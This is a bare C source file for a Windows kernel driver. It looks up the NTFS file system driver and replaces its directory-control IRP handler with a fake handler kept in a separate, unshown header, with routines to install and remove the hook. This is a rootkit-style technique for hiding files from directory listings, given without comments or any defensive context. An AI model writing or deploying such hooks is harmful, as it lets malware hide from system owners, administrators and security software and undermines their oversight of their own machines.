#include <ntddk.h>
#include <windef.h>
#include "FakeFunc.h"

NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(IN ULONG ProcessId,OUT PEPROCESS *Process);
NTKERNELAPI NTSTATUS ObReferenceObjectByName(IN PUNICODE_STRING ObjectName,IN ULONG Attributes,IN PACCESS_STATE PassedAccessState OPTIONAL,IN ACCESS_MASK DesiredAccess OPTIONAL,IN POBJECT_TYPE ObjectType,IN KPROCESSOR_MODE AccessMode,IN OUT PVOID ParseContext OPTIONAL,OUT PVOID *Object);
PDRIVER_OBJECT NtfsDrvObj;
extern POBJECT_TYPE *IoDriverObjectType;

PVOID InitIrpHook(IN PDRIVER_OBJECT DriverObject,IN ULONG IrpIndex,IN PVOID ProxyFunc)
{
	ULONG RetIrp=0;
	PULONG HookPoint;
	if(MmIsAddressValid(DriverObject))
	{
		HookPoint=(PULONG)(&DriverObject->MajorFunction[IrpIndex]);
		RetIrp=InterlockedExchange(HookPoint,(ULONG)ProxyFunc);
	}
	return (PVOID)RetIrp;
}

void StartHook()
{
	NTSTATUS st;
	UNICODE_STRING uniDrvName;
	RtlInitUnicodeString(&uniDrvName,L"\\FileSystem\\Ntfs");
	st=ObReferenceObjectByName(&uniDrvName,OBJ_CASE_INSENSITIVE,0,0,*IoDriverObjectType,KernelMode,0,&NtfsDrvObj);
	if(NT_SUCCESS(st))
	{
		NtfsFsdDirectoryControl=InitIrpHook(NtfsDrvObj,IRP_MJ_DIRECTORY_CONTROL,fake_NtfsFsdDirectoryControl);
	}
}

void StopHook()
{
	InitIrpHook(NtfsDrvObj,IRP_MJ_DIRECTORY_CONTROL,NtfsFsdDirectoryControl);
	ObDereferenceObject(NtfsDrvObj);
}
